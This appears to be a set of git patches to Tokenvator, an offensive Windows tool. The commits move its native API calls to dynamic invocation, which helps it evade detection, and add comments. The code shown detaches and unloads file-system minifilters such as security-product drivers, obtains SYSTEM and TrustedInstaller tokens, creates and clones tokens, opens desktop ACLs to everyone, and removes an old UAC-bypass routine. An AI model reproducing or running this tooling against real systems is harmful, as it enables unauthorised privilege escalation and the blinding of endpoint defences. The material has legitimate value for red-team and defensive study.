+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// 
+        /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
         ~Filters()
         {
-            Dispose();
+            if (!disposed)
+            {
+                Dispose();
+            }
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// 
+        /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public virtual void Dispose()
         {
-            fltlib.FilterFindClose(hFilters);
+            ////////////////////////////////////////////////////////////////////////////////
+            // Closes the filter handle
+            // fltlib.FilterFindClose(hFilters);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hFilterFindClose = Generic.GetExportAddress(hfltlib, "FilterFindClose");
+            MonkeyWorks.fltlib.FilterFindClose fFilterFindClose = (MonkeyWorks.fltlib.FilterFindClose)Marshal.GetDelegateForFunctionPointer(hFilterFindClose, typeof(MonkeyWorks.fltlib.FilterFindClose));
+
+            uint retVal = 0;
+            try
+            {
+                retVal = fFilterFindClose(hFilters);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] FilterFindClose Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return;
+            }
+            finally
+            {
+                disposed = true;
+            }
         }
     }
 }
diff --git a/Tokenvator/Resources/Misc.cs b/Tokenvator/Resources/Misc.cs
index c4a30c9..25f87f7 100644
--- a/Tokenvator/Resources/Misc.cs
+++ b/Tokenvator/Resources/Misc.cs
@@ -1,7 +1,8 @@
 using System;
+using System.Collections.Generic;
 using System.IO;
 using System.Linq;
-
+using System.Management;
 using MonkeyWorks.Unmanaged.Libraries;
 
 using Tokenvator.Plugins.Execution;
@@ -65,6 +66,7 @@ internal static string GenerateUuid(int length)
             return new string(Enumerable.Repeat(chars, length).Select(s => s[random.Next(s.Length)]).ToArray());
         }
 
+        #region Error Reporting
         ////////////////////////////////////////////////////////////////////////////////
         ////////////////////////////////////////////////////////////////////////////////
         public static void GetLsaNtError(string location, uint ntError)
@@ -105,6 +107,37 @@ public static void GetWin32Error(string location)
             Console.WriteLine(" [-] Function {0} failed: ", location);
             Console.WriteLine(" [-] {0}", new System.ComponentModel.Win32Exception(System.Runtime.InteropServices.Marshal.GetLastWin32Error()).Message);
         }
+        #endregion
+
+        ////////////////////////////////////////////////////////////////////////////////
+        ////////////////////////////////////////////////////////////////////////////////
+        public static uint GetProcessId(string processName)
+        {
+            uint ProcessId = 0;
+
+            List<ManagementObject> systemProcesses = new List<ManagementObject>();
+            ManagementScope scope = new ManagementScope(@"\\.\root\cimv2");
+            scope.Connect();
+            if (!scope.IsConnected)
+            {
+                Console.WriteLine("[-] Failed to connect to WMI");
+            }
+
+            Console.WriteLine(" [*] Querying for service: " + processName);
+            ObjectQuery query = new ObjectQuery("SELECT * FROM Win32_Service WHERE Name = \'" + processName + "\'");
+            ManagementObjectSearcher objectSearcher = new ManagementObjectSearcher(scope, query);
+            ManagementObjectCollection objectCollection = objectSearcher.Get();
+            if (objectCollection == null)
+            {
+                Console.WriteLine("ManagementObjectCollection");
+            }
+            foreach (ManagementObject managementObject in objectCollection)
+            {
+                ProcessId = (uint)managementObject["ProcessId"];
+            }
+            Console.WriteLine(" [+] Returned PID: " + ProcessId);
+            return ProcessId;
+        }
 
         ////////////////////////////////////////////////////////////////////////////////
         // Pops an item from the input and returns the item - only used in inital menu
diff --git a/Tokenvator/Tokenvator.csproj b/Tokenvator/Tokenvator.csproj
index abc4933..758a7dd 100644
--- a/Tokenvator/Tokenvator.csproj
+++ b/Tokenvator/Tokenvator.csproj
@@ -188,7 +188,6 @@
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\Winuser.cs" />
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\wudfwdm.cs" />
     <Compile Include="Plugins\Execution\PSExec.cs" />
-    <Compile Include="Plugins\Execution\Services.cs" />
     <Compile Include="Plugins\AccessTokens\TokenDriver.cs" />
     <Compile Include="Plugins\AccessTokens\TokenManipulation.cs" />
   </ItemGroup>

From 3cc39fee8cfdf316148dc0fcb42d7122071f3b4f Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Mon, 13 Sep 2021 14:30:30 -0500
Subject: [PATCH 21/36] Filters Commenting and updating plugin calls

---
 Tokenvator/MainLoop.Modules.cs                |  94 ++++++++++----
 Tokenvator/MainLoop.cs                        |   4 +-
 .../Plugins/MiniFilters/FilterInstance.cs     |  20 +--
 Tokenvator/Plugins/MiniFilters/Filters.cs     | 116 ++++++++++++------
 4 files changed, 163 insertions(+), 71 deletions(-)

diff --git a/Tokenvator/MainLoop.Modules.cs b/Tokenvator/MainLoop.Modules.cs
index 0161ea7..d560ddd 100644
--- a/Tokenvator/MainLoop.Modules.cs
+++ b/Tokenvator/MainLoop.Modules.cs
@@ -24,28 +24,6 @@ namespace Tokenvator
 {
     partial class MainLoop
     {
-        ////////////////////////////////////////////////////////////////////////////////
-        //
-        ////////////////////////////////////////////////////////////////////////////////
-        private static void _DisableGroup(CommandLineParsing cLP, IntPtr hToken)
-        {
-            string groups;
-            if (!cLP.GetData("groups", out groups))
-            {
-                return;
-            }
-
-            using (TokenManipulation tm = new TokenManipulation(hToken))
-            {
-                if (cLP.Remote && tm.OpenProcessToken(cLP.ProcessID))
-                    tm.SetWorkingTokenToRemote();
-                else
-                    tm.SetWorkingTokenToSelf();
-
-                tm.DisableTokenGroup(groups);
-            }
-        }
-
         ////////////////////////////////////////////////////////////////////////////////
         //
         ////////////////////////////////////////////////////////////////////////////////
@@ -207,6 +185,78 @@ private static void _CreateToken(CommandLineParsing cLP, IntPtr hToken)
             }
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        //
+        ////////////////////////////////////////////////////////////////////////////////
+        private static void _DisableGroup(CommandLineParsing cLP, IntPtr hToken)
+        {
+            string groups;
+            if (!cLP.GetData("groups", out groups))
+            {
+                return;
+            }
+
+            using (TokenManipulation tm = new TokenManipulation(hToken))
+            {
+                if (cLP.Remote && tm.OpenProcessToken(cLP.ProcessID))
+                    tm.SetWorkingTokenToRemote();
+                else
+                    tm.SetWorkingTokenToSelf();
+
+                tm.DisableTokenGroup(groups);
+            }
+        }
+
+        ////////////////////////////////////////////////////////////////////////////////
+        //
+        ////////////////////////////////////////////////////////////////////////////////
+        private static void _FilterDetach(CommandLineParsing cLP)
+        {
+            string filter;
+            if (!cLP.GetData("filter", out filter))
+            {
+                Console.WriteLine("[-] /Filter: Not Specified");
+                return;
+            }
+
+            string volume;
+            if (!cLP.GetData("volume", out volume))
+            {
+                Console.WriteLine("[-] /Volume: Not Specified");
+                return;
+            }
+
+            string instance;
+            if (!cLP.GetData("instance", out instance))
+            {
+                Console.WriteLine("[-] /Instance: Not Specified");
+                return;
+            }
+
+            using (Filters f = new Filters())
+            {
+                f.FilterDetach(filter, volume, instance);
+            }
+        }
+
+        ////////////////////////////////////////////////////////////////////////////////
+        //
+        ////////////////////////////////////////////////////////////////////////////////
+        private static void _FilterUnload(CommandLineParsing cLP)
+        {
+            string filter;
+            if (!cLP.GetData("filter", out filter))
+            {
+                Console.WriteLine("[-] Filter Not Specified");
+                return;
+            }
+
+            using (Filters f = new Filters())
+            {
+                f.FilterUnload(filter);
+            }
+        }
+
         ////////////////////////////////////////////////////////////////////////////////
         // Use Native APIs to find processes that a user is running 
         ////////////////////////////////////////////////////////////////////////////////
diff --git a/Tokenvator/MainLoop.cs b/Tokenvator/MainLoop.cs
index dd2d857..b438d5a 100644
--- a/Tokenvator/MainLoop.cs
+++ b/Tokenvator/MainLoop.cs
@@ -180,7 +180,7 @@ internal void Run()
                         _UnInstallDriver(cLP);
                         break;
                     case "detach_filter":
-                        Filters.FilterDetach(cLP);
+                        _FilterDetach(cLP);
                         break;
                     case "disable_group":
                         _DisableGroup(cLP, hToken);
@@ -298,7 +298,7 @@ internal void Run()
                         _UnInstallDriver(cLP);
                         break;
                     case "unload_filter":
-                        Filters.Unload(cLP);
+                        _FilterUnload(cLP);
                         break;
                     case "whoami":
                         Console.WriteLine("[*] Operating as {0}", WindowsIdentity.GetCurrent().Name);
diff --git a/Tokenvator/Plugins/MiniFilters/FilterInstance.cs b/Tokenvator/Plugins/MiniFilters/FilterInstance.cs
index 41cfa05..e7a056f 100644
--- a/Tokenvator/Plugins/MiniFilters/FilterInstance.cs
+++ b/Tokenvator/Plugins/MiniFilters/FilterInstance.cs
@@ -21,20 +21,22 @@ class FilterInstance : Filters
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// 
+        /// Default constructor
+        /// No Conversion Required
         /// </summary>
         /// <param name="filterName"></param>
         ////////////////////////////////////////////////////////////////////////////////
         internal FilterInstance(string filterName) : base()
         {
             this.filterName = filterName;
-
         }
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// 
+        /// Iterates through the first filter instance
+        /// Converted to D/Invoke GetExportAddress
         /// </summary>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
         [SecurityCritical]
         [HandleProcessCorruptedStateExceptions]
@@ -105,7 +107,8 @@ internal override bool First()
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// 
+        /// Iterates through the subsequent filter instances after the first
+        /// Converted to D/Invoke GetExportAddress
         /// </summary>
         /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
@@ -181,7 +184,8 @@ internal override bool Next()
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// 
+        /// Prints the Filter instances output
+        /// No Conversion Required
         /// </summary>
         /// <param name="baseAddress"></param>
         ////////////////////////////////////////////////////////////////////////////////
@@ -216,7 +220,8 @@ private void Print(IntPtr baseAddress)
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// 
+        /// Default Deconsturctor
+        /// No Conversion Required
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         ~FilterInstance()
@@ -229,7 +234,8 @@ private void Print(IntPtr baseAddress)
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// 
+        /// IDisposable - closes the handle to the filter instances
+        /// Converted to D/Invoke GetExportAddress
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         [SecurityCritical]
diff --git a/Tokenvator/Plugins/MiniFilters/Filters.cs b/Tokenvator/Plugins/MiniFilters/Filters.cs
index 34802d2..bcd8c51 100644
--- a/Tokenvator/Plugins/MiniFilters/Filters.cs
+++ b/Tokenvator/Plugins/MiniFilters/Filters.cs
@@ -5,7 +5,7 @@
 using DInvoke.DynamicInvoke;
 
 using MonkeyWorks.Unmanaged.Headers;
-using MonkeyWorks.Unmanaged.Libraries;
+//using MonkeyWorks.Unmanaged.Libraries;
 
 using Tokenvator.Resources;
 
@@ -17,8 +17,10 @@ class Filters : IDisposable
     {
         private bool disposed = false;
 
-        protected uint ERROR_FLT_FILTER_NOT_FOUND = 2149515283;
-        protected uint ERROR_INSUFFICIENT_BUFFER = 2147942522;
+        protected const uint ERROR_FLT_FILTER_NOT_FOUND = 2149515283;
+        protected const uint ERROR_INSUFFICIENT_BUFFER = 2147942522;
+        protected const uint ERROR_PRIVILEGE_NOT_HELD = 2147943714;
+        protected const uint ERROR_FLT_DO_NOT_DETACH = 2149515280;
 
         protected IntPtr hfltlib;
 
@@ -27,17 +29,18 @@ class Filters : IDisposable
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// 
+        /// Default constructor
+        /// No Conversion Required
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         public Filters()
         {
-            Console.WriteLine();
         }
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// 
+        /// Loads the fltlib.dll for invocation
+        /// Converted to D/Invoke GetPebLdrModuleEntry/LoadModuleFromDisk
         /// </summary>
         /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
@@ -61,8 +64,10 @@ internal bool Load()
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// 
+        /// Iterates through the first filter returned by the handle
+        /// Converted to D/Invoke GetExportAddress
         /// </summary>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
         [SecurityCritical]
         [HandleProcessCorruptedStateExceptions]
@@ -127,8 +132,10 @@ internal virtual bool First()
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// 
+        /// Iterates through the subsequent filters after the first
+        /// Converted to D/Invoke GetExportAddress
         /// </summary>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
         [SecurityCritical]
         [HandleProcessCorruptedStateExceptions]
@@ -193,6 +200,13 @@ internal virtual bool Next()
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Prints the Filters and altitudes output
+        /// No Conversion Required
+        /// </summary>
+        /// <param name="baseAddress"></param>
+        ////////////////////////////////////////////////////////////////////////////////
         private static void Print(IntPtr baseAddress)
         {
             var info = (FltUserStructures._FILTER_AGGREGATE_BASIC_INFORMATION)Marshal.PtrToStructure(baseAddress, typeof(FltUserStructures._FILTER_AGGREGATE_BASIC_INFORMATION));
@@ -235,72 +249,92 @@ private static void Print(IntPtr baseAddress)
             while (0 != offset);
         }
 
-        internal static void FilterDetach(CommandLineParsing cLP)
-        {
-            string filter;
-            if (!cLP.GetData("filter", out filter))
-            {
-                Console.WriteLine("[-] /Filter: Not Specified");
-                return;
-            }
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Detaches an instance of a minifilter
+        /// Converted to D/Invoke GetExportAddress
+        /// </summary>
+        /// <param name="cLP"></param>
+        ////////////////////////////////////////////////////////////////////////////////
+        internal void FilterDetach(string filter, string volume, string instance)
+        {      
+            ////////////////////////////////////////////////////////////////////////////////
+            // fltlib.FilterDetach(filter, volume, instance);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hFilterDetach = Generic.GetExportAddress(hfltlib, "FilterDetach");
+            MonkeyWorks.fltlib.FilterDetach fFilterDetach = (MonkeyWorks.fltlib.FilterDetach)Marshal.GetDelegateForFunctionPointer(hFilterDetach, typeof(MonkeyWorks.fltlib.FilterDetach));
 
-            string instance;
-            if (!cLP.GetData("instance", out instance))
+            uint retVal = 0;
+            try
             {
-                Console.WriteLine("[-] /Instance: Not Specified");
-                return;
+                retVal = fFilterDetach(filter, volume, instance);
             }
-
-            string volume;
-            if (!cLP.GetData("volume", out volume))
+            catch (Exception ex)
             {
-                Console.WriteLine("[-] /Volume: Not Specified");
+                Console.WriteLine("[-] FilterDetach Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
                 return;
             }
 
-            uint result = fltlib.FilterDetach(filter, volume, instance);
-            if (0 != result)
+            if (0 != retVal)
             {
-                if (2147943714 == result)
+                if (ERROR_PRIVILEGE_NOT_HELD == retVal)
                 {
                     Console.WriteLine("[-] Privilege Not Held (Probably SeLoadDriverPrivilege)");
                     return;
                 }
-                else if (2149515280 == result)
+                else if (ERROR_FLT_DO_NOT_DETACH == retVal)
                 {
                     Console.WriteLine("[-] Filter does not have a detach routine");
                     return;
                 }
-                Console.WriteLine("FilterDetach Failed: 0x{0}", result.ToString("X4"));
+                Console.WriteLine("FilterDetach Failed: 0x{0}", retVal.ToString("X4"));
                 return;
             }
 
             Console.WriteLine("[+] Filter Detached");
         }
 
-        internal static void Unload(CommandLineParsing cLP)
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Unloads a loaded minifilter
+        /// Converted to D/Invoke GetExportAddress
+        /// </summary>
+        /// <param name="cLP"></param>
+        ////////////////////////////////////////////////////////////////////////////////
+        internal void FilterUnload(string filter)
         {
-            string filter;
-            if (!cLP.GetData("filter", out filter))
+            ////////////////////////////////////////////////////////////////////////////////
+            // fltlib.FilterUnload(filter);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hFilterUnload = Generic.GetExportAddress(hfltlib, "FilterUnload");
+            MonkeyWorks.fltlib.FilterUnload fFilterUnload = (MonkeyWorks.fltlib.FilterUnload)Marshal.GetDelegateForFunctionPointer(hFilterUnload, typeof(MonkeyWorks.fltlib.FilterUnload));
+
+            uint retVal = 0;
+            try
             {
-                Console.WriteLine("[-] Filter Not Specified");
+                retVal = fFilterUnload(filter);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] FilterUnload Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
                 return;
             }
 
-            uint result = fltlib.FilterUnload(filter);
-            if (0 != result)
+            if (0 != retVal)
             {
-                if (2147943714 == result)
+                if (ERROR_PRIVILEGE_NOT_HELD == retVal)
                 {
                     Console.WriteLine("[-] Privilege Not Held (Probably SeLoadDriverPrivilege)");
                     return;
                 }
-                else if (2149515280 == result)
+                else if (ERROR_FLT_DO_NOT_DETACH == retVal)
                 {
                     Console.WriteLine("[-] Filter does not have a detach routine");
                     return;
                 }
-                Console.WriteLine("FilterUnload Failed: 0x{0}", result.ToString("X4"));
+                Console.WriteLine("FilterUnload Failed: 0x{0}", retVal.ToString("X4"));
                 return;
             }
             Console.WriteLine("[+] Filter Unloaded");
@@ -308,7 +342,8 @@ internal static void Unload(CommandLineParsing cLP)
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// 
+        /// Default Deconsturctor
+        /// No Conversion Required
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         ~Filters()
@@ -321,7 +356,8 @@ internal static void Unload(CommandLineParsing cLP)
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// 
+        /// IDisposable - closes the handle to the filters
+        /// Converted to D/Invoke GetExportAddress
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         [SecurityCritical]

From 0faa4be88714476aea8f04945603a482d997631c Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Wed, 15 Sep 2021 12:00:00 -0500
Subject: [PATCH 22/36] Removed all remaining P/Invokes

---
 Tokenvator/MainLoop.Modules.cs                | 693 ++++++++++++------
 Tokenvator/MainLoop.cs                        | 223 +++---
 .../Plugins/AccessTokens/AccessTokens.cs      |  34 +-
 .../Plugins/AccessTokens/CreateTokens.cs      |   9 +
 .../Plugins/AccessTokens/TokenManipulation.cs |  43 +-
 Tokenvator/Plugins/Execution/CreateProcess.cs |  68 +-
 Tokenvator/Plugins/NamedPipes/NamedPipes.cs   | 218 +++---
 Tokenvator/Resources/Misc.cs                  |  53 +-
 Tokenvator/Tokenvator.csproj                  |  12 -
 9 files changed, 867 insertions(+), 486 deletions(-)

diff --git a/Tokenvator/MainLoop.Modules.cs b/Tokenvator/MainLoop.Modules.cs
index d560ddd..1d2c923 100644
--- a/Tokenvator/MainLoop.Modules.cs
+++ b/Tokenvator/MainLoop.Modules.cs
@@ -8,6 +8,8 @@
 using System.Security.Principal;
 using System.Threading;
 
+using DInvoke.DynamicInvoke;
+
 using Tokenvator.Resources;
 using Tokenvator.Plugins.AccessTokens;
 using Tokenvator.Plugins.Enumeration;
@@ -16,18 +18,26 @@
 using Tokenvator.Plugins.NamedPipes;
 
 using MonkeyWorks.Unmanaged.Headers;
-using MonkeyWorks.Unmanaged.Libraries;
+//using MonkeyWorks.Unmanaged.Libraries;
 
 using System.IO;
+using System.Runtime.InteropServices;
+using System.Runtime.ExceptionServices;
+using System.Security;
 
 namespace Tokenvator
 {
+    using MonkeyWorks = MonkeyWorks.Unmanaged.Libraries.DInvoke;
+
     partial class MainLoop
     {
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// Adds a privilege via the token driver
+        /// No Conversion Required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _AddPrivilege(CommandLineParsing cLP)
+        private void _AddPrivilege()
         {
             TokenDriver.PRIVILEGES priv = Misc.ParseEnum<TokenDriver.PRIVILEGES>(cLP.Privilege);
 
@@ -58,11 +68,14 @@ private static void _AddPrivilege(CommandLineParsing cLP)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Enables, Disables, or Removes a privilege from a Token
+        /// <summary>
+        /// Enables, Disables, or Removes a privilege from a Token
+        /// No Conversion Required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _AlterPrivilege(CommandLineParsing cLP, IntPtr hToken, Winnt.TokenPrivileges attribute)
+        private void _AlterPrivilege(Winnt.TokenPrivileges attribute)
         {
-            using (TokenManipulation t = new TokenManipulation(hToken))
+            using (TokenManipulation t = new TokenManipulation(currentProcessToken))
             {
                 if (cLP.Remote && !cLP.Impersonation && t.OpenProcessToken(cLP.ProcessID))
                 {
@@ -87,41 +100,14 @@ private static void _AlterPrivilege(CommandLineParsing cLP, IntPtr hToken, Winnt
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // UAC Token Magic - Deprecated
-        ////////////////////////////////////////////////////////////////////////////////
-        /*
-        private static void _BypassUAC(CommandLineParsing cLP, IntPtr hToken)
-        {
-            Console.WriteLine("[*] Notice: This no longer working on versions of Windows 10 > 1703");
-            if (cLP.Remote)
-            {
-                using (RestrictedToken rt = new RestrictedToken(hToken))
-                {
-                    rt.BypassUAC(cLP.ProcessID, cLP.Command);
-                }
-            }
-            else
-            {
-                string name = WindowsIdentity.GetCurrent().Name;
-                Dictionary<uint, string> uacUsers = UserSessions.EnumerateUserProcesses(true, name);
-                foreach (uint pid in uacUsers.Keys)
-                {
-                    Console.WriteLine("\n[*] Attempting Bypass with PID {0} ({1})", pid, uacUsers[pid]);
-                    using (RestrictedToken rt = new RestrictedToken(hToken))
-                    {
-                        rt.BypassUAC((int)pid, cLP.Command);
-                    }
-                }
-            }
-        }
-        */
-
-        ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// Sets the ACL for a desktop and window stations to everyone
+        /// No Conversion Required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _ClearDesktopACL(IntPtr hToken)
+        private void _ClearDesktopACL()
         {
-            using (DesktopACL dA = new DesktopACL(hToken))
+            using (DesktopACL dA = new DesktopACL(currentProcessToken))
             {
                 dA.LoadModule();
                 dA.OpenWindow();
@@ -130,13 +116,16 @@ private static void _ClearDesktopACL(IntPtr hToken)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// Clones all the attributes of an existing token and creates a new one
+        /// No Conversion Required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _CloneToken(CommandLineParsing cLP, IntPtr hToken)
+        private void _CloneToken()
         {
             try
             {
-                using (CreateTokens ct = new CreateTokens(hToken))
+                using (CreateTokens ct = new CreateTokens(currentProcessToken))
                 {
                     ct.SetWorkingTokenToSelf();
                     ct.CloneToken(cLP.ProcessID, cLP.Command);
@@ -149,15 +138,19 @@ private static void _CloneToken(CommandLineParsing cLP, IntPtr hToken)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // https://github.com/numbnet/Win32-OpenSSH/blob/8dd7423e13ac0b88b3084ec95bc93ea09dec1fef/contrib/win32/win32compat/win32auth.c
-        // https://github.com/bb107/WinSudo/blob/b2cb7700bd2f7ee59e2ef7f9ca20c2a671ce72a8/PrivilegeHelps/Security.cpp
-        // https://www.exploit-db.com/papers/42556
+        /// <summary>
+        /// Creates a new token
+        ///  https://github.com/numbnet/Win32-OpenSSH/blob/8dd7423e13ac0b88b3084ec95bc93ea09dec1fef/contrib/win32/win32compat/win32auth.c
+        /// https://github.com/bb107/WinSudo/blob/b2cb7700bd2f7ee59e2ef7f9ca20c2a671ce72a8/PrivilegeHelps/Security.cpp
+        /// https://www.exploit-db.com/papers/42556
+        /// No Conversion Required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _CreateToken(CommandLineParsing cLP, IntPtr hToken)
+        private void _CreateToken()
         {   
             try
             {
-                using (CreateTokens ct = new CreateTokens(hToken))
+                using (CreateTokens ct = new CreateTokens(currentProcessToken))
                 {
                     string[] groups = new string[0];
                     string g;
@@ -186,9 +179,12 @@ private static void _CreateToken(CommandLineParsing cLP, IntPtr hToken)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// Disables a group on a tokens
+        /// No Conversion Required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _DisableGroup(CommandLineParsing cLP, IntPtr hToken)
+        private void _DisableGroup()
         {
             string groups;
             if (!cLP.GetData("groups", out groups))
@@ -196,7 +192,7 @@ private static void _DisableGroup(CommandLineParsing cLP, IntPtr hToken)
                 return;
             }
 
-            using (TokenManipulation tm = new TokenManipulation(hToken))
+            using (TokenManipulation tm = new TokenManipulation(IntPtr.Zero))
             {
                 if (cLP.Remote && tm.OpenProcessToken(cLP.ProcessID))
                     tm.SetWorkingTokenToRemote();
@@ -208,9 +204,12 @@ private static void _DisableGroup(CommandLineParsing cLP, IntPtr hToken)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// Detaches a filter instanse
+        /// No Conversion Required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _FilterDetach(CommandLineParsing cLP)
+        private void _FilterDetach()
         {
             string filter;
             if (!cLP.GetData("filter", out filter))
@@ -240,9 +239,12 @@ private static void _FilterDetach(CommandLineParsing cLP)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// Unloads a minifilter
+        /// No Conversion Required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _FilterUnload(CommandLineParsing cLP)
+        private void _FilterUnload()
         {
             string filter;
             if (!cLP.GetData("filter", out filter))
@@ -258,9 +260,12 @@ private static void _FilterUnload(CommandLineParsing cLP)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Use Native APIs to find processes that a user is running 
+        /// <summary>
+        /// Use Native APIs to find processes that a user is running 
+        /// No Conversion Required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _FindUserProcesses(CommandLineParsing cLP)
+        private void _FindUserProcesses()
         {
             string user;
             if (!cLP.GetData("username", out user))
@@ -278,9 +283,12 @@ private static void _FindUserProcesses(CommandLineParsing cLP)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Use WMI to find processes that a user is running 
+        /// <summary>
+        /// Use WMI to find processes that a user is running 
+        /// No Conversion Required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _FindUserProcessesWMI(CommandLineParsing cLP)
+        private void _FindUserProcessesWMI()
         {
             string user;
             if (!cLP.GetData("username", out user))
@@ -298,23 +306,33 @@ private static void _FindUserProcessesWMI(CommandLineParsing cLP)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Impersonates a SYSTEM token or creates a new process with the cloned token
+        /// <summary>
+        /// Impersonates a SYSTEM token or creates a new process with the duplicated token
+        /// No Conversion Required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _GetSystem(CommandLineParsing cLP, IntPtr hToken)
+        private void _GetSystem()
         {
-            using (TokenInformation ti = new TokenInformation(hToken))
+            using (TokenInformation ti = new TokenInformation(currentProcessToken))
             {
                 ti.SetWorkingTokenToSelf();
                 if (!ti.CheckTokenPrivilege(Winnt.SE_DEBUG_NAME))
                 {
-                    if (string.IsNullOrEmpty(cLP.Command))
-                        NamedPipes.GetSystem();
-                    else
-                        NamedPipes.GetSystem(cLP.Command, cLP.Arguments);
+                    using (NamedPipes np = new NamedPipes())
+                    {
+                        if (string.IsNullOrEmpty(cLP.Command))
+                        {
+                            np.GetSystem();
+                        }
+                        else
+                        {
+                            np.GetSystem(cLP.Command, cLP.Arguments);
+                        }
+                    }
                 }
                 else
                 {
-                    using (TokenManipulation t = new TokenManipulation(hToken))
+                    using (TokenManipulation t = new TokenManipulation(currentProcessToken))
                     {
                         t.SetWorkingTokenToSelf();
 
@@ -330,32 +348,34 @@ private static void _GetSystem(CommandLineParsing cLP, IntPtr hToken)
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Delegates out to _GetTrustedInstallerLogon and _GetTrustedInstallerService
+        /// No Conversion Required
         /// </summary>
         /// <param name="cLP"></param>
-        /// <param name="hToken"></param>
+        /// <param name="currentProcessToken"></param>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _GetTrustedInstaller(CommandLineParsing cLP, IntPtr hToken)
+        private void _GetTrustedInstaller()
         {
             if (cLP.Legacy)
             {
-                _GetTrustedInstallerService(cLP, hToken);
+                _GetTrustedInstallerService();
             }
             else
             {
-                _GetTrustedInstallerLogon(cLP, hToken);
+                _GetTrustedInstallerLogon();
             }
         }
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Calls LogonUserExExW with NT SERVICE\TrustedInstaller listed as a group
+        /// No Conversion Required
         /// </summary>
         /// <param name="cLP"></param>
-        /// <param name="hToken"></param>
+        /// <param name="currentProcessToken"></param>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _GetTrustedInstallerLogon(CommandLineParsing cLP, IntPtr hToken)
+        private void _GetTrustedInstallerLogon()
         {
-            using (CreateTokens ct = new CreateTokens(hToken))
+            using (CreateTokens ct = new CreateTokens())
             {
                 ct.LogonUser(
                     "NT AUTHORITY", 
@@ -372,13 +392,14 @@ private static void _GetTrustedInstallerLogon(CommandLineParsing cLP, IntPtr hTo
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Starts Windows Module Installer and impersonates or starts a process with 
+        /// No Conversion Required
         /// </summary>
         /// <param name="cLP"></param>
-        /// <param name="hToken"></param>
+        /// <param name="currentProcessToken"></param>
         ////////////////////////////////////////////////////////////////////////////////
